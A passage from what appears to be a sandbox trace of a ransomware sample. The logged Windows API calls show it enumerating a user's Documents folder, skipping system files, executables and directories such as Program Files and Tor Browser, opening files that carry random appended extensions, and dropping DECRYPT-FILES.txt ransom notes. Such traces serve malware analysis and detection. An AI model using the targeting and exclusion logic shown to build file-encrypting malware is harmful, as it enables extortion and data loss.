(lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="boot.ini") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="desktop.ini") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="ntuser.dat") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="iconcache.db") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="bootsect.bak") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="ntuser.dat.log") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="thumbs.db") returned 1 [0185.312] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.pdf.eBbly", lpString2="Bootfont.bin") returned 1 [0185.312] lstrlenW (lpString="-Wm-t35s2VO0tWM.pdf.eBbly") returned 25 [0185.312] lstrcmpiW (lpString1="eBbly", lpString2="lnk") returned -1 [0185.312] lstrcmpiW (lpString1="eBbly", lpString2="exe") returned -1 [0185.312] lstrcmpiW (lpString1="eBbly", lpString2="sys") returned -1 [0185.312] lstrcmpiW (lpString1="eBbly", lpString2="dll") returned 1 [0185.312] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.312] lstrlenW (lpString="-Wm-t35s2VO0tWM.pdf.eBbly") returned 25 [0185.312] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.312] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="-Wm-t35s2VO0tWM.pdf.eBbly" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf.eBbly") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf.eBbly" [0185.312] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf.eBbly" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\-wm-t35s2vo0twm.pdf.ebbly"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.313] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=32976) returned 1 [0185.313] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.313] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.313] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.314] CloseHandle (hObject=0x268) returned 1 [0185.314] CloseHandle (hObject=0x264) returned 1 [0185.314] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.314] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1293c00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1293c00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1293c00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.314] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.314] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.314] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.314] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.314] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.314] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.314] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.314] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.314] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.314] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\0a16c9.tmp" [0185.314] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.315] CloseHandle (hObject=0x0) returned 0 [0185.315] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.315] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96218390, ftCreationTime.dwHighDateTime=0x1d4ca20, ftLastAccessTime.dwLowDateTime=0xa4f81400, ftLastAccessTime.dwHighDateTime=0x1d4cc92, ftLastWriteTime.dwLowDateTime=0xae7e37c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4085, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", cAlternateFileName="1FBHJO~1.WZK")) returned 1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="DECRYPT-FILES.txt") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="autorun.inf") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="boot.ini") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="desktop.ini") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="ntuser.dat") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="iconcache.db") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="bootsect.bak") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="ntuser.dat.log") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="thumbs.db") returned -1 [0185.315] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW", lpString2="Bootfont.bin") returned -1 [0185.315] lstrlenW (lpString="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW") returned 32 [0185.315] lstrcmpiW (lpString1="WZkBZW", lpString2="lnk") returned 1 [0185.315] lstrcmpiW (lpString1="WZkBZW", lpString2="exe") returned 1 [0185.315] lstrcmpiW (lpString1="WZkBZW", lpString2="sys") returned 1 [0185.315] lstrcmpiW (lpString1="WZkBZW", lpString2="dll") returned 1 [0185.315] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.315] lstrlenW (lpString="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW") returned 32 [0185.315] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.316] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW" [0185.316] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx.WZkBZW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\1fbhjo h3cvvf6llyw8c.xlsx.wzkbzw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.316] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=16517) returned 1 [0185.316] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.316] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.317] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.317] CloseHandle (hObject=0x268) returned 1 [0185.317] CloseHandle (hObject=0x264) returned 1 [0185.317] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.317] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb63c6c00, ftCreationTime.dwHighDateTime=0x1d4ce47, ftLastAccessTime.dwLowDateTime=0xcc8ecc0, ftLastAccessTime.dwHighDateTime=0x1d4cb9f, ftLastWriteTime.dwLowDateTime=0xae809920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x51ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="a05Mw73tf.docx.kPbHL74", cAlternateFileName="A05MW7~1.KPB")) returned 1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="DECRYPT-FILES.txt") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="autorun.inf") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="boot.ini") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="desktop.ini") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="ntuser.dat") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="iconcache.db") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="bootsect.bak") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="ntuser.dat.log") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="thumbs.db") returned -1 [0185.318] lstrcmpiW (lpString1="a05Mw73tf.docx.kPbHL74", lpString2="Bootfont.bin") returned -1 [0185.318] lstrlenW (lpString="a05Mw73tf.docx.kPbHL74") returned 22 [0185.318] lstrcmpiW (lpString1="kPbHL74", lpString2="lnk") returned -1 [0185.318] lstrcmpiW (lpString1="kPbHL74", lpString2="exe") returned 1 [0185.318] lstrcmpiW (lpString1="kPbHL74", lpString2="sys") returned -1 [0185.318] lstrcmpiW (lpString1="kPbHL74", lpString2="dll") returned 1 [0185.318] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.318] lstrlenW (lpString="a05Mw73tf.docx.kPbHL74") returned 22 [0185.318] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.318] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="a05Mw73tf.docx.kPbHL74" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx.kPbHL74") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx.kPbHL74" [0185.318] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx.kPbHL74" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\a05mw73tf.docx.kpbhl74"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.319] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=20970) returned 1 [0185.319] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.319] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.319] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.319] CloseHandle (hObject=0x268) returned 1 [0185.320] CloseHandle (hObject=0x264) returned 1 [0185.320] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.320] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae797500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae797500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae797500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.320] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.320] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd18a2700, ftCreationTime.dwHighDateTime=0x1d4d0e4, ftLastAccessTime.dwLowDateTime=0xa699b520, ftLastAccessTime.dwHighDateTime=0x1d4cbd9, ftLastWriteTime.dwLowDateTime=0xae82fa80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x176ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="FAus_oITOLQc.ppt.9Ot6wi0", cAlternateFileName="FAUS_O~1.9OT")) returned 1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="DECRYPT-FILES.txt") returned 1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="autorun.inf") returned 1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="boot.ini") returned 1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="desktop.ini") returned 1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="ntuser.dat") returned -1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="iconcache.db") returned -1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="bootsect.bak") returned 1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="ntuser.dat.log") returned -1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="thumbs.db") returned -1 [0185.320] lstrcmpiW (lpString1="FAus_oITOLQc.ppt.9Ot6wi0", lpString2="Bootfont.bin") returned 1 [0185.320] lstrlenW (lpString="FAus_oITOLQc.ppt.9Ot6wi0") returned 24 [0185.320] lstrcmpiW (lpString1="9Ot6wi0", lpString2="lnk") returned -1 [0185.320] lstrcmpiW (lpString1="9Ot6wi0", lpString2="exe") returned -1 [0185.320] lstrcmpiW (lpString1="9Ot6wi0", lpString2="sys") returned -1 [0185.320] lstrcmpiW (lpString1="9Ot6wi0", lpString2="dll") returned -1 [0185.320] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.320] lstrlenW (lpString="FAus_oITOLQc.ppt.9Ot6wi0") returned 24 [0185.320] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.320] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="FAus_oITOLQc.ppt.9Ot6wi0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt.9Ot6wi0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt.9Ot6wi0" [0185.320] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.321] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt.9Ot6wi0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\faus_oitolqc.ppt.9ot6wi0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.321] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=95982) returned 1 [0185.321] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.321] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.322] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.322] CloseHandle (hObject=0x268) returned 1 [0185.322] CloseHandle (hObject=0x264) returned 1 [0185.322] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.322] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdfafcb60, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xaea44dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea44dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i4ouEKS0Y1j5q3bJi", cAlternateFileName="I4OUEK~1")) returned 1 [0185.322] lstrcmpW (lpString1="i4ouEKS0Y1j5q3bJi", lpString2=".") returned 1 [0185.322] lstrcmpW (lpString1="i4ouEKS0Y1j5q3bJi", lpString2="..") returned 1 [0185.322] lstrcatW (in: lpString1="i4ouEKS0Y1j5q3bJi", lpString2="\\" | out: lpString1="i4ouEKS0Y1j5q3bJi\\") returned="i4ouEKS0Y1j5q3bJi\\" [0185.322] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0185.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Program Files") returned 0x0 [0185.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch=":\\Windows") returned 0x0 [0185.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Games\\") returned 0x0 [0185.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.322] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\All Users") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="AhnLab") returned 0x0 [0185.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.323] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.323] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.323] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\0a16c9.tmp") returned 86 [0185.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0185.325] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.325] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.325] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\DECRYPT-FILES.txt") returned 93 [0185.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 